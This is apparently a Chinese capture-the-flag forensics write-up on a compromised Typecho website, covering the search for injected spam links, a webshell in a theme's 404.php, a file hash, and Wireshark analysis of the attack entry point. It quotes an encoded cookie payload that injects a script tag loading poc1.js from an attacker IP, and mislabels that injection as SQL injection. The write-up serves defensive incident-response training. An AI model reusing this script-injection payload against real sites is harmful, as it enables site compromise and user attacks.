第五章 linux实战-黑链

finalshell通过ssh连接linux机器

1.找到黑链添加在哪个文件 flag 格式 flag{xxx.xxx}

执行查找命令

复制代码
grep -rnw '/var/www/html/' -e '黑链'
代码分析
复制代码
以下是对"grep -rnw '/var/www/html/' -e '黑链'"这段代码的分析:

一、整体功能

这段代码使用 grep 命令在指定的目录 /var/www/html/ 中搜索包含特定字符串"黑链"的内容。

二、参数解释

• -r:递归搜索,即对指定目录及其子目录中的所有文件进行搜索。

• -n:在输出结果中显示匹配行的行号。

• -w:只匹配整个单词,确保搜索的"黑链"不是其他单词的一部分。

• /var/www/html/:指定要搜索的目录路径。

• -e '黑链':指定要搜索的模式为"黑链"。

三、用途

主要用于查找可能存在的恶意黑链。在网站安全检查中,如果在 /var/www/html/ 目录下的网页文件中发现了"黑链"字样,可能意味着网站被黑客入侵并植入了非法链接,以便及时采取措施进行清理和修复,保障网站的安全和正常运行。

flag

复制代码
flag{header.php}

2.webshell的绝对路径 flag{xxxx/xxx/xxx/xxx/}

下载html文件夹

使用D盾查杀

找到webshell后门文件特征($_POST)

flag

复制代码
flag{/var/www/html/usr/themes/default/404.php}

3.黑客注入黑链文件的 md5 md5sum file flag{md5}

打开可疑文件所在位置

发现黑链文件

执行MD5编码命令

复制代码
 certutil -hashfile .\poc1.js MD5
代码分析
复制代码
以下是对"certutil -hashfile.\poc1.js MD5"这段代码的分析:

一、整体功能

这段代码使用 certutil 命令来计算指定文件(这里是当前目录下的"poc1.js"文件)的 MD5 哈希值。

二、参数解释

• -hashfile:表示对指定文件进行哈希计算。

• .\poc1.js:指定要计算哈希值的文件路径,这里是当前目录下的"poc1.js"文件。

• MD5:指定要计算的哈希算法为 MD5。

三、用途

1. 完整性校验:可以用于验证文件在传输或存储过程中是否被篡改。如果文件的 MD5 哈希值与预期的哈希值不同,那么文件很可能已经被修改。

2. 识别重复文件:不同的文件通常具有不同的 MD5 哈希值,所以可以通过比较文件的 MD5 哈希值来判断两个文件是否相同。

3. 安全检查:在某些安全场景下,通过计算文件的哈希值可以帮助检测恶意软件或非法修改的文件。

flag

复制代码
flag{10c18029294fdec7b6ddab76d9367c14}

4.攻击入口是哪里?url请求路径,最后面加/ flag{/xxxx.xxx/xxxx/x/}

wireshark分析pacp文件

执行查找命令

复制代码
http contains "poc1.js"
代码分析
复制代码
以下是对"http contains "poc1.js""的分析:

一、整体含义

这可能是一个用于分析 HTTP 流量的过滤条件或搜索表达式。

二、具体解释

"http"通常代表与 HTTP 协议相关的内容,在这里可能指的是 HTTP 请求、响应或者是 HTTP 通信的日志等。"contains"表示包含的意思,后面的""poc1.js""是一个特定的字符串。

三、用途场景

1. 网络安全分析:在网络流量监测中,使用这个表达式可以快速筛选出包含特定文件名"poc1.js"的 HTTP 通信。这可能有助于检测潜在的恶意软件传播或异常的文件访问行为。例如,如果发现大量不明来源的 HTTP 请求中包含"poc1.js",可能暗示着有针对性的攻击活动。

2. 故障排查:在排查网络应用故障时,如果知道某个特定的脚本文件"poc1.js"可能与问题相关,通过这个表达式可以在大量的 HTTP 日志中快速定位到与该文件有关的通信记录,以便进一步分析问题的根源。

3. 性能优化:对于大型的网络应用,分析 HTTP 流量中特定文件的请求情况可以帮助优化资源加载策略。如果发现"poc1.js"文件的请求频率很高或者响应时间较长,可以考虑对该文件进行优化,如压缩、缓存或者优化服务器配置以提高响应速度。

找到可疑cookie,根据关键词得知这是SQL注入

对该cookie进行url解码

复制代码
https://www.sojson.com/encodeurl.html
09f1f9758c26c309477b55f3a4bac8de__typecho_remember_url=http%3A%2F%2Fxxx.xxx.com%2F%22%3E%3C%2Fa%3E%3Cscript%2Fsrc%3Dhttp%3A%2F%2F192.168.20.130%2Fpoc1.js%3E%3C%2Fscript%3E%3Ca%2Fhref%3D%22%23

确定flag为

flag

复制代码
flag{/index.php/archives/1/}
相关推荐
..过云雨11 分钟前
04.【Linux系统编程】基础开发工具2(makefile、进度条程序实现、版本控制器Git、调试器gdb/cgdb的使用)
linux·笔记·学习
zzzsde22 分钟前
【Linux】初识Linux
linux·运维·服务器
fouryears_2341727 分钟前
云服务器使用代理稳定与github通信方法
运维·服务器·github
渡我白衣31 分钟前
Linux网络:应用层协议http
linux·网络·http
pofenx44 分钟前
使用nps创建隧道,进行内网穿透
linux·网络·内网穿透·nps
Ronin3051 小时前
【Linux系统】单例式线程池
linux·服务器·单例模式·线程池·线程安全·死锁
wanhengidc1 小时前
手机云服务是什么意思?
运维·网络·安全·游戏·智能手机
desssq1 小时前
ubuntu 18.04 泰山派编译报错
linux·运维·ubuntu
Lzc7741 小时前
Linux的多线程
linux·linux的多线程
清风笑烟语1 小时前
Ubuntu 24.04 搭建k8s 1.33.4
linux·ubuntu·kubernetes